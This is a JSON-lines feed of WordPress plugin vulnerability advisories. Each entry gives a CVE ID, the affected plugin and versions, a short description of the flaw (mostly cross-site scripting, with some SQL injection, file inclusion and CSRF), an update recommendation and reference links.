{"CVE_ID":"CVE-2024-9344","slug":"searchpro","versionImpact":"2.1.1","versionEndExcluding":"2.1.2","description":"The BerqWP \u2013 Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'url' parameter in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01d5e5b5-033c-4690-9857-3339e2831340?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01d5e5b5-033c-4690-9857-3339e2831340?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3160806%40searchpro&new=3160806%40searchpro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3160806%40searchpro&new=3160806%40searchpro&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchpro\\\/trunk\\\/simplehtmldom\\\/example\\\/scraping\\\/example_scraping_general.php?rev=3138385\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchpro\\\/trunk\\\/simplehtmldom\\\/example\\\/scraping\\\/example_scraping_general.php?rev=3138385\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3248","slug":"mystickyelements","versionEndExcluding":"2.1.2","description":"The All-in-one Floating Contact Form WordPress plugin before 2.1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90c7496b-552f-4566-b7ae-8c953c965352\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90c7496b-552f-4566-b7ae-8c953c965352\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12502","slug":"my-idx-home-search","versionImpact":"2.1.1","versionEndExcluding":"2.1.2","description":"The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-landing' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-idx-home-search\\\/trunk\\\/includes\\\/class-homeasap-search-loader.php#L147\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-idx-home-search\\\/trunk\\\/includes\\\/class-homeasap-search-loader.php#L147\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d17aca2b-5ac6-46cd-a439-f492e6573a46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d17aca2b-5ac6-46cd-a439-f492e6573a46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11889","slug":"my-idx-home-search","versionImpact":"2.1.1","versionEndExcluding":"2.1.2","description":"The My IDX Home Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'homeasap-idx-search' shortcode in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-idx-home-search\\\/trunk\\\/includes\\\/class-homeasap-search-loader.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-idx-home-search\\\/trunk\\\/includes\\\/class-homeasap-search-loader.php#L133\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/my-idx-home-search\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/my-idx-home-search\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/172b6b54-d1de-48f9-ad2f-00d62d7e91fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/172b6b54-d1de-48f9-ad2f-00d62d7e91fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5604","slug":"bug-library","versionImpact":"2.1.1","versionEndExcluding":"2.1.2","description":"The Bug Library WordPress plugin before 2.1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/29985150-8d49-4a3f-8411-5d7263b424d8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/29985150-8d49-4a3f-8411-5d7263b424d8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0071","slug":"wp-expand-tabs-free","versionEndExcluding":"2.1.17","description":"The WP Tabs WordPress plugin before 2.1.17 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3834a162-2cdc-41e9-9c9d-2b576eed4db9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3834a162-2cdc-41e9-9c9d-2b576eed4db9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13727","slug":"memberspace","versionImpact":"2.1.13","versionEndExcluding":"2.1.14","description":"The MemberSpace WordPress plugin before 2.1.14 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"Update to version 2.1.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/598d20f2-0f42-48f2-a941-0d6c5da5303e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/598d20f2-0f42-48f2-a941-0d6c5da5303e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4450","slug":"post-grid","versionEndExcluding":"2.1.13","description":"The Post Grid plugin for WordPress is vulnerable to blind SQL Injection via post metadata in versions up to, and including, 2.1.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers with contributor-level permissions and above to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a321b112-ce37-4a0e-800f-f3feef6ac799?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a321b112-ce37-4a0e-800f-f3feef6ac799?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2644269\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2644269\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-38704","slug":"wp-team-manager","versionImpact":"2.1.12","versionEndExcluding":"2.1.13","description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in DynamicWebLab WordPress Team Manager allows PHP Local File Inclusion. This issue affects WordPress Team Manager: from n\/a through 2.1.12.","recommendation":"Update to version 2.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-team-manager\\\/wordpress-team-manager-plugin-2-1-12-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-team-manager\\\/wordpress-team-manager-plugin-2-1-12-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9703","slug":"arconix-shortcodes","versionImpact":"2.1.12","versionEndExcluding":"2.1.13","description":"The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 2.1.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef395956-477c-4970-becd-4f437e4807a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef395956-477c-4970-becd-4f437e4807a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3170741%40arconix-shortcodes&new=3170741%40arconix-shortcodes&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3170741%40arconix-shortcodes&new=3170741%40arconix-shortcodes&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11911","slug":"wp-crowdfunding","versionImpact":"2.1.12","versionEndExcluding":"2.1.13","description":"The WP Crowdfunding plugin for WordPress is vulnerable to unauthorized plugin installation due to a missing capability check on the install_woocommerce_plugin() function action in all versions up to, and including, 2.1.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install WooCommerce. This has a limited impact on most sites because WooCommerce is a requirement.","recommendation":"Update to version 2.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3206336%40wp-crowdfunding%2Ftrunk&old=3174230%40wp-crowdfunding%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3206336%40wp-crowdfunding%2Ftrunk&old=3174230%40wp-crowdfunding%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/972be091-64c4-4cb7-9563-70249c0db157?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/972be091-64c4-4cb7-9563-70249c0db157?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0862","slug":"supersaas-appointment-scheduling","versionImpact":"2.1.12","versionEndExcluding":"2.1.13","description":"The SuperSaaS \u2013 online appointment scheduling plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018after\u2019 parameter in all versions up to, and including, 2.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is limited to Chromium-based browsers (e.g. Chrome, Edge, Brave).","recommendation":"Update to version 2.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supersaas-appointment-scheduling\\\/tags\\\/2.1.12\\\/includes\\\/shortcode.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supersaas-appointment-scheduling\\\/tags\\\/2.1.12\\\/includes\\\/shortcode.php#L15\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supersaas-appointment-scheduling\\\/tags\\\/2.1.12\\\/includes\\\/shortcode.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/supersaas-appointment-scheduling\\\/tags\\\/2.1.12\\\/includes\\\/shortcode.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235242\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235242\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8698255b-6c03-464b-8cb5-191d3e77009f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8698255b-6c03-464b-8cb5-191d3e77009f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0170","slug":"html5-audio-player","versionEndExcluding":"2.1.12","description":"The Html5 Audio Player WordPress plugin before 2.1.12 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19ee5e33-acc8-40c5-8f54-c9cb0fa491f0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19ee5e33-acc8-40c5-8f54-c9cb0fa491f0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2299","slug":"luckywp-table-of-contents","versionImpact":"2.1.10","versionEndExcluding":"2.1.11","description":"The LuckyWP Table of Contents plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.10. This is due to missing or incorrect nonce validation on the 'ajaxEdit' function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/trunk\\\/admin\\\/controllers\\\/EditorBlockController.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/trunk\\\/admin\\\/controllers\\\/EditorBlockController.php#L30\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/trunk\\\/admin\\\/widgets\\\/customizeSuccess\\\/views\\\/widget.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/luckywp-table-of-contents\\\/trunk\\\/admin\\\/widgets\\\/customizeSuccess\\\/views\\\/widget.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3265169\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3265169\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82df5b2e-4c4a-402f-99c9-694fa710009b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82df5b2e-4c4a-402f-99c9-694fa710009b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12579","slug":"minify-html-markup","versionImpact":"2.1.10","versionEndExcluding":"2.1.11","description":"The Minify HTML plugin for WordPress is vulnerable to Regular Expression Denial of Service (ReDoS) in all versions up to, and including, 2.1.10. This is due to processing user-supplied input as a regular expression.  This makes it possible for unauthenticated attackers to create comments that can cause catastrophic backtracking and break pages.","recommendation":"Update to version 2.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203890\\\/minify-html-markup\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203890\\\/minify-html-markup\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80334e81-c33d-464c-9409-f49c34681890?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80334e81-c33d-464c-9409-f49c34681890?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6163","slug":"wp-crowdfunding","versionImpact":"2.1.9","versionEndExcluding":"2.1.10","description":"The WP Crowdfunding WordPress plugin before 2.1.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ed6de4d-0a37-497f-971d-b6711893c557\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ed6de4d-0a37-497f-971d-b6711893c557\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25147","slug":"pretty-link","versionEndExcluding":"2.1.10","description":"The Pretty Links plugin for WordPress is vulnerable to Stored Cross-Site Scripting via various IP headers as well as the referer header in versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping in the track_link function. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae058c5b-b90b-4a1e-9f56-d56dbd2d3607?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae058c5b-b90b-4a1e-9f56-d56dbd2d3607?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/stored-xss-and-csv-injection-vulnerabilities-in-wordpress-shortlinks-by-pretty-links-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/stored-xss-and-csv-injection-vulnerabilities-in-wordpress-shortlinks-by-pretty-links-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2108490%40pretty-link%2Ftrunk&old=2078274%40pretty-link%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2108490%40pretty-link%2Ftrunk&old=2078274%40pretty-link%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1526","slug":"dethemekit-for-elementor","versionImpact":"2.1.9","versionEndExcluding":"2.1.10","description":"The DethemeKit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the De Product Display Widget (countdown feature) in all versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/dethemekit-addons.js#L815\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dethemekit-for-elementor\\\/trunk\\\/assets\\\/frontend\\\/js\\\/dethemekit-addons.js#L815\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255121%40dethemekit-for-elementor&new=3255121%40dethemekit-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3255121%40dethemekit-for-elementor&new=3255121%40dethemekit-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e01ae00-0d07-4e9a-928e-e10cf679df2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e01ae00-0d07-4e9a-928e-e10cf679df2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7070","slug":"email-encoder-bundle","versionImpact":"2.1.9","versionEndExcluding":"2.1.10","description":"The Email Encoder \u2013 Protect Email Addresses and Phone Numbers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's eeb_mailto shortcode in all versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5afe6ea-93b8-4782-8593-76468e370a45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5afe6ea-93b8-4782-8593-76468e370a45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/trunk\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L518\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/trunk\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L518\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/trunk\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-encoder-bundle\\\/trunk\\\/core\\\/includes\\\/classes\\\/class-email-encoder-bundle-run.php#L529\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3019206%40email-encoder-bundle&new=3019206%40email-encoder-bundle&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3019206%40email-encoder-bundle&new=3019206%40email-encoder-bundle&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11438","slug":"stream-status-for-twitch","versionImpact":"2.1.9","versionEndExcluding":"2.1.10","description":"The StreamWeasels Online Status Bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sw-status-bar' shortcode in all versions up to, and including, 2.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192626%40stream-status-for-twitch&new=3192626%40stream-status-for-twitch&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192626%40stream-status-for-twitch&new=3192626%40stream-status-for-twitch&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cfbb817-1bb2-4829-9a63-d8e579053000?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cfbb817-1bb2-4829-9a63-d8e579053000?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1805","slug":"product-catalog-feed","versionEndExcluding":"2.1.1","description":"The Product Catalog Feed by PixelYourSite WordPress plugin before 2.1.1 does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46b4582f-7651-4b74-a00b-1788587ecfa8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46b4582f-7651-4b74-a00b-1788587ecfa8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1804","slug":"product-catalog-feed","versionEndExcluding":"2.1.1","description":"The Product Catalog Feed by PixelYourSite WordPress plugin before 2.1.1 does not sanitise and escape the edit parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55b28fa6-a54f-4365-9d59-f9e331c1e11b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55b28fa6-a54f-4365-9d59-f9e331c1e11b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12585","slug":"propertyhive","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The Property Hive WordPress plugin before 2.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afecf367-d298-4f4c-8f47-4e19b3937d3e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/afecf367-d298-4f4c-8f47-4e19b3937d3e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3895","slug":"wp-datepicker","versionImpact":"2.1.0","versionEndExcluding":"2.1.1","description":"The WP Datepicker plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpdp_add_new_datepicker_ajax() function in all versions up to, and including, 2.1.0. This makes it possible for authenticated attackers, with  subscriber-level access and above, to update arbitrary options that can be used for privilege escalation. This was partially patched in 2.0.9 and 2.1.0, and fully patched in 2.1.1.","recommendation":"Update to version 2.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45a42f20-a4d7-4c8e-a144-505a6723a2a0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45a42f20-a4d7-4c8e-a144-505a6723a2a0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073525\\\/wp-datepicker\\\/trunk\\\/inc\\\/functions_inner.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3073525\\\/wp-datepicker\\\/trunk\\\/inc\\\/functions_inner.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3073221%40wp-datepicker&new=3073221%40wp-datepicker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3073221%40wp-datepicker&new=3073221%40wp-datepicker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3071975%40wp-datepicker&new=3071975%40wp-datepicker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3071975%40wp-datepicker&new=3071975%40wp-datepicker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
